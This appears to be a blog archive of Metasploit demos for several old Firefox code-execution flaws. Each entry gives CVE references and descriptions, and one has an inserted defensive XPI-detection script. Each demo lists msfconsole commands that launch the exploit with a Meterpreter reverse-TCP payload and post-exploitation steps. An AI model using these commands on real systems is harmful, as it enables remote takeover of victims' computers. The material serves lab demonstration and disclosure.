Tag Archives: Mozilla

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

Timeline :

Vulnerability found by Jason Avery on 2007-06-27
Metasploit PoC provided on 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this works without a restart because the add-on is marked as “bootstrapped”. Since the add-on would otherwise execute the payload again after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.
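As an added example (not code from the original post or from the Metasploit module), a small Python triage script that checks whether an .xpi declares itself bootstrapped, which is the property the description above relies on for restart-free execution. It assumes the legacy pre-WebExtension layout (install.rdf with an em:bootstrap flag plus a bootstrap.js at the archive root); the sample add-on it inspects is constructed in memory.

```python
"""Triage helper: flag legacy Firefox XPI add-ons that declare themselves
bootstrapped (installed and started without a browser restart)."""
import io
import re
import zipfile

# Assumed legacy XPI layout: a zip with install.rdf at the root; bootstrapped
# add-ons set <em:bootstrap>true</em:bootstrap> and ship a bootstrap.js whose
# startup() entry point runs as soon as the add-on is installed.
BOOTSTRAP_RE = re.compile(r"<em:bootstrap>\s*true\s*</em:bootstrap>", re.I)


def triage_xpi(data: bytes) -> dict:
    """Return indicators for one XPI given as raw bytes."""
    result = {"has_install_rdf": False, "bootstrapped": False,
              "has_bootstrap_js": False, "restartless_install": False}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if "install.rdf" in names:
            result["has_install_rdf"] = True
            rdf = zf.read("install.rdf").decode("utf-8", "replace")
            result["bootstrapped"] = bool(BOOTSTRAP_RE.search(rdf))
        result["has_bootstrap_js"] = "bootstrap.js" in names
    # Both together are what lets code run at install time with no restart.
    result["restartless_install"] = result["bootstrapped"] and result["has_bootstrap_js"]
    return result


def make_sample_xpi(bootstrapped: bool) -> bytes:
    """Build a minimal sample XPI in memory (constructed test data, not a real add-on)."""
    flag = "true" if bootstrapped else "false"
    rdf = f"""<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>sample@example.invalid</em:id>
    <em:version>1.0</em:version>
    <em:bootstrap>{flag}</em:bootstrap>
  </Description>
</RDF>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("install.rdf", rdf)
        if bootstrapped:
            # Empty placeholder entry points; a real add-on's startup() carries its logic.
            zf.writestr("bootstrap.js", "function install(){}\nfunction startup(){}\n"
                        "function shutdown(){}\nfunction uninstall(){}\n")
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print(flag, triage_xpi(make_sample_xpi(flag)))
```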

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy on 2011-06-13
Public release of the vulnerability on 2011-06-21
Metasploit PoC provided on 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index to be used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compared to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor on 2011-02-17
Coordinated public release of the vulnerability on 2011-04-28
Metasploit PoC provided on 2011-08-10

PoC provided by :

regenrecht
Rh0

Reference(s) :

CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13

Affected version(s) :

Firefox 3.6.17 and below
Firefox 3.5.19 and below
SeaMonkey 2.0.14 and below

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element’s mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel then becomes a dangling pointer and can be reused when setting the OBJECT’s data attribute (discovered by regenrecht). This module uses a heap spray with a minimal ROP chain to bypass DEP on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability

Timeline :

Vulnerability discovered by regenrecht
Vulnerability reported to vendor by ZDI on 2011-02-02
Coordinated public release of advisory on 2011-05-09
Metasploit exploit released on 2011-07-10

PoC provided by :

regenrecht
xero

Reference(s) :

CVE-2011-0073
OSVDB-72087
ZDI-11-157
MFSA-2011-13

Affected version(s) :

Firefox 3.6.16 and below
Firefox 3.5.18 and below
SeaMonkey 2.0.13 and below

Tested on Windows XP SP3 with :

Firefox 3.6.9

Description :

This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x and 3.5.x found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides, it is possible to bypass DEP without the need for a ROP chain. Sadly, this exploit is still either dependent on Java or bound by ASLR, because Firefox no longer ships any ASLR-free modules.

Commands :

use exploit/windows/browser/mozilla_nstreerange
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig